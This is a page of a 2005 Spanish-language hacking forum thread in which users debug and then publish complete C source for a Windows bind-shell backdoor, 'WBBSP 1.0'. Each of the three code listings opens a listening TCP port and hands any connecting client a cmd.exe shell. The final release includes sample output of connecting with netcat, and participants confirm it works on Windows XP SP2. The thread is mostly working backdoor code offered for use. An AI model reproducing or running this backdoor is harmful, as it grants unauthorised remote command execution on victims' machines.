elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Win Backdoor Bind port
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: Win Backdoor Bind port  (Leído 15,079 veces)
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #10 en: 15 Agosto 2005, 19:36 pm »

si, cuando posteastes y lo probé linkeé a esa librería. pero no funciona


En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
orphen_nb

Desconectado Desconectado

Mensajes: 130


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #11 en: 15 Agosto 2005, 19:49 pm »

Pues no se por qué no te funciona, a mi los dos códigos que te he pasado me funcionan. Pero te compila sin problemas no? excepto por los warnings...
Por cierto yo lo compilo con dev-c++...


En línea

Human knowledge belongs to the world
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #12 en: 15 Agosto 2005, 19:51 pm »

si, me compila bien, sin warnings ni nada. Yo lo compilo con el VC++
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #13 en: 15 Agosto 2005, 20:30 pm »

Según me han comentado, puede ser por el SP2.
No obstante, dime si este codigo te funciona sin modificarle nada:

Código:
#include <stdio.h>
#include <winsock2.h>
//la librería del socket
#pragma comment(lib,"wsock32")

int main()
{
/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
SOCKET Sock;//el que establece la conexion
struct sockaddr_in Winsock_In;
/*para crear el proceso de la shell*/
STARTUPINFO start_proc; /*datos del proceso*/
PROCESS_INFORMATION info_proc; /*salida del proceso*/

/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
//Winsock=socket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(4664);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=htonl(INADDR_ANY);
/*unimos el socket*/
if(bind(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In))==SOCKET_ERROR)
{
printf("ERROR - Error al bindear el socket\n");
ExitProcess(1);
}
/*lo ponemos a la escucha, a la espera de clientes*/
if(listen(Winsock,5)==SOCKET_ERROR)
{
printf("ERROR - Error al poner el socket a la escucha\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}
printf("\n[+] Esperando cliente...");
/*asociamos la conexión establecida a otro socket*/
if((Sock=accept(Winsock,NULL,NULL))==INVALID_SOCKET)
{
printf("ERROR - Error al aceptar\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}

printf("\n[+] Conexion establecida");
printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (void *)Sock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
printf("ERROR");
}else{
printf("OK");
}

ExitProcess(0);
}
« Última modificación: 15 Agosto 2005, 20:35 pm por Lympex » En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
orphen_nb

Desconectado Desconectado

Mensajes: 130


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #14 en: 15 Agosto 2005, 20:51 pm »

No, no me funciona, ya te dije que con socket() no funciona (al menos a mi...) sin embargo si lo cambio a
Winsock=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
si que me funciona no se por qué  ???, pero sin modificar nada no me funciona...

Sí, puede ser por el SP2 porque yo no lo tengo...
En línea

Human knowledge belongs to the world
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #15 en: 16 Agosto 2005, 01:31 am »

Entonces ahora te debería de funcionar sin cambiar nada. He añadido unos typecast en los nulls para que no me diera warnings. Puedesdecirme si te funciona sin modificar nada?

Código:
#include <stdio.h>
#include <winsock2.h>
//la librería del socket
#pragma comment(lib,"ws2_32")

int main()
{

/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
SOCKET Sock;//el que establece la conexion
struct sockaddr_in Winsock_In;
/*para crear el proceso de la shell*/
STARTUPINFO start_proc; /*datos del proceso*/
PROCESS_INFORMATION info_proc; /*salida del proceso*/

/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(4664);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=htonl(INADDR_ANY);
/*unimos el socket*/
if(bind(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In))==SOCKET_ERROR)
{
printf("ERROR - Error al bindear el socket\n");
ExitProcess(1);
}
/*lo ponemos a la escucha, a la espera de clientes*/
if(listen(Winsock,5)==SOCKET_ERROR)
{
printf("ERROR - Error al poner el socket a la escucha\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}
printf("\n[+] Esperando cliente...");
/*asociamos la conexión establecida a otro socket*/
if((Sock=accept(Winsock,NULL,NULL))==INVALID_SOCKET)
{
printf("ERROR - Error al aceptar\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}

printf("\n[+] Conexion establecida");
printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (void *)Sock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
printf("ERROR");
}else{
printf("OK");
}

ExitProcess(0);
}
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
orphen_nb

Desconectado Desconectado

Mensajes: 130


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #16 en: 16 Agosto 2005, 01:44 am »

Sí, ahora si me funciona sin ninguna modificación.
En línea

Human knowledge belongs to the world
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #17 en: 17 Agosto 2005, 02:09 am »

pues aquí dejo el source. Si alguien puede decir si le ha funcionado, y qué Windows es, service pack, etc. Que lo diga y así lo sabremos.

Código:
/*
====================================================================================
||  ##           #######  ##   ##    ##     #######   #######       ##    ##  ##  ||
||  ##           ##    ##  ## ##  ########  ##        ##         ######## ## ##   ||
||  ##     ##### ########   ###      ##     #######   #######       ##    ####    ||
||  ##           ##    ##   ##       ##     ##             ##  ###  ##    ## ##   ||
||  ######       #######    ##       ##     #######   #######  ###  ##    ##  ##  ||
====================================================================================

Nombre: WBBSP 1.0
Fichero: Win.Backdoor.Bind.Shell.Port.c
Descripcion: Pone un socket a la escucha en un puerto determinado para dar shell
Autor: Lympex
Contacto:
+ Web: http://l-bytes.tk
+ Mail: lympex[at]gmail[dot]com
Fecha: 16/08/2005

-::[========================================]::-

C:\>Win.Backdoor.Bind.Shell.Port.exe 5968

#####################################
#    -[ WBBSC 1.0 - by Lympex ]-    #
#-----------------------------------#
# Windows Backdoor Bind Shell Port  #
#-----------------------------------#
# Contacto:                         #
#   + HomePage: http://l-bytes.tk   #
#   + Mail: lympex[at]gmail[dot]com #
#####################################

[+] Creando el Socket...OK
[+] Esperando conexion por el puerto 5968...OK
[+] Lanzando shell...OK

C:\>

------------------------------------------------

D:\>nc.exe localhost 5968

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

-::[========================================]::-

Greetz:
-------
orphen_nb
HaCkZaTaN
P[i]

Nota: Posible fallo al dar shell en Windows XP Professional SP2
*/

#include <stdio.h>
#include <winsock2.h>
//la librería del socket
#pragma comment(lib,"ws2_32")

int main(int argc, char *argv[])
{
/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
SOCKET Sock;//el que establece la conexion
struct sockaddr_in Winsock_In;
/*para crear el proceso de la shell*/
STARTUPINFO start_proc; /*datos del proceso en el que volcar los datos/eventos*/
PROCESS_INFORMATION info_proc; /*salida del proceso de la shell*/
short Puerto;

printf("\n#####################################");
printf("\n#    -[ WBBSC 1.0 - by Lympex ]-    #");
printf("\n#-----------------------------------#");
printf("\n# Windows Backdoor Bind Shell Port  #");
printf("\n#-----------------------------------#");
printf("\n# Contacto:                         #");
printf("\n#   + HomePage: http://l-bytes.tk   #");
printf("\n#   + Mail: lympex[at]gmail[dot]com #");
printf("\n#####################################\n");

//comprobamos los argumentos
if(argc<2 || argc>2)
{
printf("\n[+] Uso: %s puerto",argv[0]);
printf("\n    + Ejemplo: %s 5968\n",argv[0]);
ExitProcess(0);
}
Puerto=atoi(argv[1]);

/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*si usamos socket en lugar de WSASocket, no funciona :/ */
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(Puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=htonl(INADDR_ANY);
/*unimos el socket*/
if(bind(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In))==SOCKET_ERROR)
{
printf("ERROR - Error al bindear el socket\n");
ExitProcess(1);
}
/*lo ponemos a la escucha, a la espera de clientes*/
if(listen(Winsock,5)==SOCKET_ERROR)
{
printf("ERROR - Error al poner el socket a la escucha\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}
printf("\n[+] Esperando conexion por el puerto %d...",Puerto);
/*asociamos la conexión establecida a otro socket*/
if((Sock=accept(Winsock,NULL,NULL))==INVALID_SOCKET)
{
printf("ERROR - Error al aceptar\n");
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
ExitProcess(1);
}else{
printf("OK");
}

printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (void *)Sock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
printf("ERROR\n");
}else{
printf("OK\n");
}

ExitProcess(0);
}
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Gangrel

Desconectado Desconectado

Mensajes: 237


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #18 en: 18 Agosto 2005, 18:58 pm »

Te sacaste un 10 compañero, lo e probado en Xp profesional SP2 y me corre de maravilla, compilado con DevC++ 4.9.9.2
En línea

La educacion no es un privilegio, es un derecho.

http://www.usuarios.lycos.es/protg
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #19 en: 18 Agosto 2005, 19:08 pm »

voy a probar compilandolo con Dev C++ a ver si es por el VC++  :o
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Bind and Reverse Backdoor Shell con Netcat
Redes
Socket_0x01 0 4,023 Último mensaje 25 Febrero 2011, 05:07 am
por Socket_0x01
port y host
Foro Libre
Panic0 1 1,555 Último mensaje 18 Agosto 2020, 23:01 pm
por EdePC
Resoluciones con Servidor DNS Bind
Redes
ernestoffdez 1 1,964 Último mensaje 19 Febrero 2021, 23:08 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines